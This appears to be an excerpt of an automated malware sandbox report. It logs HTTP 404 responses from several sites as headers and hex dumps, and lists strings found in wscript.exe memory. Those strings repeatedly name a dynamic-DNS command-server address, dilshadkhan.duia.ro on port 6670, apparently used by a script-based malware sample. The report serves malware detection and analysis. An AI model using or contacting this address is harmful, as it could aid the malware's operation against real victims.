Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 May 2022 15:29:50 GMTServer: Apache/2.4.29 (Ubuntu)Content-Length: 279Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 74 6f 70 69 6e 67 73 33 33 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at www.topings33.com Port 80</address></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 May 2022 15:29:52 GMTServer: Apache/2.4.29 (Ubuntu)Content-Length: 279Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 74 6f 70 69 6e 67 73 33 33 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at www.topings33.com Port 80</address></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closex-powered-by: PHP/7.4.29content-type: text/html; charset=UTF-8x-litespeed-tag: 440_HTTP.404expires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0link: <http://thebestvidforall.xyz/wp-json/>; rel="https://api.w.org/"x-litespeed-cache-control: no-cachetransfer-encoding: chunkedcontent-encoding: gzipvary: Accept-Encodingdate: Fri, 27 May 2022 15:30:11 GMTserver: LiteSpeedData Raw: 32 66 35 32 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec 7d 6b 73 e3 b6 92 e8 67 bb ea fc 07 0c 5d 19 4b 09 49 91 d4 9b b2 9c 3d 99 3c 36 5b c9 9e 54 26 d9 5b b7 92 d4 14 44 42 12 67 28 92 87 84 2c 39 8e ef 6f bf d5 78 f0 25 50 2f 8f 93 d4 ce 24 95 58 24 81 ee 46 a3 d1 dd 00 1a 8d 9b 17 5f fe eb d5 4f ff f7 87 af d0 92 ae c2 db cb 1b f8 83 42 1c 2d a6 1a 89 8c 9f 5f 6b f0 8e 60 ff f6 f2 e2 66 45 28 46 de 12 a7 19 a1 53 ed e7 9f be 36 46 1a ea e4 5f 22 bc 22 53 ed 2e 20 9b 24 4e a9 86 bc 38 a2 24 a2 53 6d 13 f8 74 39 f5 c9 5d e0 11 83 3d e8 28 88 02 1a e0 d0 c8 3c 1c 92 a9 cd e0 70 04 0c cc 75 1a cf 62 9a 5d e7 40 ae 57 78 6b 04 2b bc 20 46 92 12 40 e2 86 38 5d 90 6b 20 e0 86 06 34 24 b7 3f e0 05 41 51 4c d1 3c 5e 47 3e 7a 79 35 72 6c 7b 82 be bf 47 5f 84 f1 e2 a6 c3 4b 5d de 84 41 f4 0e a5 24 9c 5e fb 51 06 e0 e6 84 7a cb 6b b4 4c c9 7c 7a dd e9 d0 25 99 91 8c de 05 fe 3c 4e 71 18 9a db fb df 39 9e 43 35 33 73 63 c6 e9 a2 56 58 c3 21 25 69 84 29 d1 10 bd 4f c8 54 c3 49 12 06 1e a6 41 1c 75 d2 2c fb 6c bb 0a 35 c4 c8 9b 6a 82 5c f4 32 c5 ff 5e c7 13 f4 35 21 be c6 69 d3 96 94 26 ae 9a c0 ce 9c 10 bf c3 f9 98 93 f9 34 cc af e2 d5 8a 44 34 3b 9a 04 4f 54 28 d3 92 79 69 90 d0 db cb 4d 10 f9 f1 c6 7c b3 49 c8 2a 7e 1b bc 26 94 06 d1 22 43 53 f4 a0 cd 70 46 7e 4e 43 cd 65 0d cc dc 5f 3b bf 76 04 2b 7f ed b0 4e cf 7e ed 78 71 4a 7e ed b0 ca bf 76 ec 9e 69 99 d6 af 9d a1 b3 1d 3a bf 76 34 5d 23 5b aa b9 9a 99 44 0b 4d d7 b2 bb c5 79 f0 b2 bb 05 83 96 dd 2d be e2 00 b3 3b 06 30 5e a7 1e d1 dc 07 cd 8b 23 0f 53 46 86 a0 97 91 ab 92 99 5f 3b 9b c4 08 22 2f 5c fb 24 fb b5 f3 36 63 2f 58 55 23 25 21 c1 19 31 57 41 64 be cd 3e bf 23 e9 74 60 5a da e3 e3 e4 b2 f3 e9 0b f4 d3 32 c8 d0 3c 08 09 0a 32 84 d7 34 36 16 24 22 29 a6 c4 47 9f 76 2e 5f cc d7 91 07 d2 d3 22 3a d6 69 fb e1 0e a7 28 d2 53 3d d6 83 29 36 bd 94 60 4a be 0a 09 74 5f 4b f3 70 74 87 33 ad ad 27 d3 c0 5c 10 fa 0a 06 e6 96 be 7c 59 7e 6a 69 8e af b5 27 12 30 ca 5a 44 02 c6 d3 d7 34 0d a2 85 39 4f e3 d5 ab 25 4e 5f c5 3e d1 c9 b4 95 98 5e 48 70 fa 23 f1 68 cb d2 2d 3d 30 f9 e8 0e cc 25 09 16 4b da d6 13 73 1e 84 e1 4f 64 4b 5b d8 04 a9 bf 6f d1 65 90 e9 a4 ad 5b ba d5 d6 03 93 c6 5f 62 8a 7f fe f1 bb 56 bb 3d 49 09 5d a7 11 3a 1f 2e 15 70 c9 74 3a ad c0 7e cc 1b e6 b5 08 e7 17 dd e5 14 17 56 ad 3d a1 66 96 7a 53 a2 53 d3 27 73 92 4e a9 c9 07 2e f0 ad f3 16 df 61 51 52 c7 c0 50 c1 e9 ec 8b fb 9f f0 e2 bf f1 8a b4 34 d0 99 5a fb 17 eb 37 68 35 89 fc 57 cb 20 f4 5b b4 fd 38 8f d3 56 3c fd 67 9a e2 fb 96 36 0f 31 48 17 97 a6 b6 4e cd
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closex-powered-by: PHP/7.4.29content-type: text/html; charset=UTF-8expires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0link: <http://thebestvidforall.xyz/wp-json/>; rel="https://api.w.org/"x-litespeed-cache-control: public,max-age=3600x-litespeed-tag: 440_HTTP.404,440_404,440_URL.249cf122f2d92b3e82f0723a2e93dc1c,440_x-litespeed-cache: misstransfer-encoding: chunkeddate: Fri, 27 May 2022 15:30:11 GMTserver: LiteSpeedData Raw: 66 35 34 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 4d 79 20 42 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 74 68 65 62 65 73 74 76 69 64 66 6f 72 61 6c 6c 2e 78 79 7a 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 73 2e 77 2e 6f 72 67 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4d 79 20 42 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 74 68 65 62 65 73 74 76 69 64 66 6f 72 61 6c 6c 2e 78 79 7a 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4d 79 20 42 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 74 68 65 62 65 73 74 76 69 64 66 6f 72 61 6c 6c 2e 78 79 7a 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 34 2e 30 2e 30 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 34 2e 30 2e 30 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 Data Ascii:
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closex-powered-by: PHP/7.4.29content-type: text/html; charset=UTF-8x-litespeed-tag: 440_HTTP.404expires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0link: <http://thebestvidforall.xyz/wp-json/>; rel="https://api.w.org/"x-litespeed-cache-control: no-cachetransfer-encoding: chunkedcontent-encoding: gzipvary: Accept-Encodingdate: Fri, 27 May 2022 15:30:11 GMTserver: LiteSpeedData Raw: 32 66 35 32 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec 7d 6b 73 e3 b6 92 e8 67 bb ea fc 07 0c 5d 19 4b 09 49 91 d4 9b b2 9c 3d 99 3c 36 5b c9 9e 54 26 d9 5b b7 92 d4 14 44 42 12 67 28 92 87 84 2c 39 8e ef 6f bf d5 78 f0 25 50 2f 8f 93 d4 ce 24 95 58 24 81 ee 46 a3 d1 dd 00 1a 8d 9b 17 5f fe eb d5 4f ff f7 87 af d0 92 ae c2 db cb 1b f8 83 42 1c 2d a6 1a 89 8c 9f 5f 6b f0 8e 60 ff f6 f2 e2 66 45 28 46 de 12 a7 19 a1 53 ed e7 9f be 36 46 1a ea e4 5f 22 bc 22 53 ed 2e 20 9b 24 4e a9 86 bc 38 a2 24 a2 53 6d 13 f8 74 39 f5 c9 5d e0 11 83 3d e8 28 88 02 1a e0 d0 c8 3c 1c 92 a9 cd e0 70 04 0c cc 75 1a cf 62 9a 5d e7 40 ae 57 78 6b 04 2b bc 20 46 92 12 40 e2 86 38 5d 90 6b 20 e0 86 06 34 24 b7 3f e0 05 41 51 4c d1 3c 5e 47 3e 7a 79 35 72 6c 7b 82 be bf 47 5f 84 f1 e2 a6 c3 4b 5d de 84 41 f4 0e a5 24 9c 5e fb 51 06 e0 e6 84 7a cb 6b b4 4c c9 7c 7a dd e9 d0 25 99 91 8c de 05 fe 3c 4e 71 18 9a db fb df 39 9e 43 35 33 73 63 c6 e9 a2 56 58 c3 21 25 69 84 29 d1 10 bd 4f c8 54 c3 49 12 06 1e a6 41 1c 75 d2 2c fb 6c bb 0a 35 c4 c8 9b 6a 82 5c f4 32 c5 ff 5e c7 13 f4 35 21 be c6 69 d3 96 94 26 ae 9a c0 ce 9c 10 bf c3 f9 98 93 f9 34 cc af e2 d5 8a 44 34 3b 9a 04 4f 54 28 d3 92 79 69 90 d0 db cb 4d 10 f9 f1 c6 7c b3 49 c8 2a 7e 1b bc 26 94 06 d1 22 43 53 f4 a0 cd 70 46 7e 4e 43 cd 65 0d cc dc 5f 3b bf 76 04 2b 7f ed b0 4e cf 7e ed 78 71 4a 7e ed b0 ca bf 76 ec 9e 69 99 d6 af 9d a1 b3 1d 3a bf 76 34 5d 23 5b aa b9 9a 99 44 0b 4d d7 b2 bb c5 79 f0 b2 bb 05 83 96 dd 2d be e2 00 b3 3b 06 30 5e a7 1e d1 dc 07 cd 8b 23 0f 53 46 86 a0 97 91 ab 92 99 5f 3b 9b c4 08 22 2f 5c fb 24 fb b5 f3 36 63 2f 58 55 23 25 21 c1 19 31 57 41 64 be cd 3e bf 23 e9 74 60 5a da e3 e3 e4 b2 f3 e9 0b f4 d3 32 c8 d0 3c 08 09 0a 32 84 d7 34 36 16 24 22 29 a6 c4 47 9f 76 2e 5f cc d7 91 07 d2 d3 22 3a d6 69 fb e1 0e a7 28 d2 53 3d d6 83 29 36 bd 94 60 4a be 0a 09 74 5f 4b f3 70 74 87 33 ad ad 27 d3 c0 5c 10 fa 0a 06 e6 96 be 7c 59 7e 6a 69 8e af b5 27 12 30 ca 5a 44 02 c6 d3 d7 34 0d a2 85 39 4f e3 d5 ab 25 4e 5f c5 3e d1 c9 b4 95 98 5e 48 70 fa 23 f1 68 cb d2 2d 3d 30 f9 e8 0e cc 25 09 16 4b da d6 13 73 1e 84 e1 4f 64 4b 5b d8 04 a9 bf 6f d1 65 90 e9 a4 ad 5b ba d5 d6 03 93 c6 5f 62 8a 7f fe f1 bb 56 bb 3d 49 09 5d a7 11 3a 1f 2e 15 70 c9 74 3a ad c0 7e cc 1b e6 b5 08 e7 17 dd e5 14 17 56 ad 3d a1 66 96 7a 53 a2 53 d3 27 73 92 4e a9 c9 07 2e f0 ad f3 16 df 61 51 52 c7 c0 50 c1 e9 ec 8b fb 9f f0 e2 bf f1 8a b4 34 d0 99 5a fb 17 eb 37 68 35 89 fc 57 cb 20 f4 5b b4 fd 38 8f d3 56 3c fd 67 9a e2 fb 96 36 0f 31 48 17 97 a6 b6 4e cd
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 27 May 2022 15:30:23 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 27 May 2022 15:30:23 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 27 May 2022 15:30:23 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: wscript.exe, 00000001.00000003.384485036.000001B74541E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.384967035.000001B745438000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro/
Source: wscript.exe, 00000001.00000003.384485036.000001B74541E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.384967035.000001B745438000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro/sers
Source: wscript.exe, 00000001.00000003.384485036.000001B74541E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.384967035.000001B745438000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro/tXPUBLIC=C:
Source: wscript.exe, 0000000F.00000002.790309780.0000023E30CBB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000F.00000002.788499693.0000023E2EF22000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000F.00000002.785750450.000000DCB1B92000.00000004.00000010.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/
Source: wscript.exe, 00000006.00000003.309444184.000001A547DA9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/)
Source: wscript.exe, 00000001.00000003.554186645.000001B742E19000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.823061632.000001B745406000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.384485036.000001B74541E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.710089935.000001B742E19000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.384727755.000001B7453C5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.787143262.000001B742DEC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.845175203.000001B745469000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.554050285.000001B745454000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.384967035.000001B745438000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.815158211.000001B7453E5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.384997666.000001B74540D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.384691056.000001B7453AD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.845140560.000001B745459000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.384897364.000001B745406000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.553568378.000001B74544C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.554153165.000001B745468000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.797140717.000001B744CB0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.714035079.000001B7453AD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.801731870.000001B7453A0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.574260264.000001A547F9E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.573810530.000001A547FEF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vre
Source: wscript.exe, 00000001.00000003.710326547.000001B745435000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.384485036.000001B74541E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vre$
Source: wscript.exe, 00000001.00000002.823061632.000001B745406000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vre$_&
Source: wscript.exe, 00000001.00000003.554050285.000001B745454000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.553568378.000001B74544C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.554153165.000001B745468000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vre%(
Source: wscript.exe, 00000001.00000003.554050285.000001B745454000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.553568378.000001B74544C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.554153165.000001B745468000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vre((
Source: wscript.exe, 00000006.00000003.574260264.000001A547F9E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000002.788120944.000001A547F90000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.436255759.000001A547F9E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.573544181.000001A547F92000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.757111866.000001A547F9E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.436056290.000001A547F92000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.435803969.000001A548020000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vre-
Source: wscript.exe, 00000001.00000002.823061632.000001B745406000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vre._8
Source: wscript.exe, 00000001.00000003.554050285.000001B745454000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.553568378.000001B74544C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vre.duia.ro:6670/Vre
Source: wscript.exe, 00000001.00000003.554068672.000001B745435000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.554186645.000001B742E19000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.712605938.000001B745460000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.710326547.000001B745435000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.710089935.000001B742E19000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.837496420.000001B745436000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.714724265.000001B74541F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.714465991.000001B745406000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.845175203.000001B745469000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.554050285.000001B745454000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.712760640.000001B745457000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.710577509.000001B745454000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.808474712.000001B7453C5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.384997666.000001B74540D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.384897364.000001B745406000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.553568378.000001B74544C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.384955138.000001B742E0E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.801731870.000001B7453A0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vre0
Source: wscript.exe, 0000000C.00000003.456045967.0000010D3844A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.456254408.0000010D3844F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.456298399.0000010D3845B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vre02-00600806D9B6
Source: wscript.exe, 00000006.00000002.787307667.000001A54611E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vre1dG
Source: wscript.exe, 00000006.00000003.436368850.000001A547FEF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vre2a
Source: wscript.exe, 00000006.00000003.757128359.000001A547FB4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.572232415.000001A548047000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.574615041.000001A54800F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.574519981.000001A54800C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.574051437.000001A548051000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.573367613.000001A54800B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.435803969.000001A548020000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000002.788220340.000001A547FB4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.799462457.0000010D383C0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000F.00000002.799686175.0000023E30EB0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vre63209-4053062332-100
